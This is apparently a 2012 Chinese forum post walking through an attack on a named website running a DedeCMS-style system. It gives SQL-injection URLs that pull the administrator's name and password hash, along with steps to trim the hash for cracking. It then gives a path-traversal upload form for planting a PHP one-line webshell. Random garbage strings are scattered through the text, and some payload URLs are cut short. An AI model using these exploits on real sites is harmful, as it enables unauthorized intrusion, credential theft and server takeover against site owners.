①注入漏洞。" p# N) K+ _! W0 c* U, O, W
这站 http://www.political-security.com/& f+ `+ L0 y1 p# p/ l' ]) K# x- t( V
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,, j! |7 M7 |) K* p
www.political-security.com/data/mysql_error_trace.inc 爆后台5 f2 X; F# z n/ \
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。( [0 m0 C3 ^0 n+ M! ^
然后写上语句
4 S) @- Y" e: F查看管理员帐号
0 p8 Z2 q+ ?' `http://www.political-security.co ... &membergroup=@`
6 Z1 Z+ T7 _# k" G5 ~+ m1 i) E* A: b4 M! B4 N; R
admin 1 L/ |" J) h+ A! A {. w
$ S8 c4 L/ t( F% O: u) e; y. k查看管理员密码% j3 }) t' A1 S3 L4 t3 F, z
http://www.political-security.co ... &membergroup=@` j, h3 \6 L5 e3 G8 z
& D+ I; \( l( i
8d29b1ef9f8c5a5af429
0 H4 _7 t4 v- j% `: a, B/ Q1 e+ N0 y: r% g+ e: B
查看管理员密码
* `; Q- L$ I1 h3 N5 e, U, Q* S P
8 D( ~- @+ W) I% {( e8 H" F" E: e得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5. [ E+ A/ j; @ K) w! Y$ [
; ]0 c# S9 T% K) L! R
8d2
5 X1 g! g" L3 q9 E8 D9b1ef9f8c5a5af42" S$ F! q) W7 |8 Z( A0 n% }& Y0 f Y
9% R' j& C" Q6 g' d L, Q1 a
; M4 s2 P2 W# G" d6 w z$ ocmd5没解出来 只好测试第二个方法. Q3 O) \9 W8 W) n
( e3 \; B8 B, [! b" `+ \
4 H: W, k* L) j8 L. V" `②上传漏洞:& a$ r9 S8 g2 H1 Z6 M
% j( ?2 l1 }$ ?" n* F. s只要登陆会员中心,然后访问页面链接9 n# X; z4 ~* l! |
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”5 U3 [8 S/ r3 m' E- ?% f. U a" r
$ r" k$ C5 d& h! r9 F2 n3 p
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”; e0 X+ Q, y2 Z. P1 R1 U5 s. o
5 I+ b% Q$ Y. l于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm2 @& ^2 k& {) I6 D$ o- g
/ K1 e5 w6 R) b4 f/ a
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>! h6 d# p. M ]% X' n( s
或者
/ N4 S; I/ `7 g6 T: ^即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对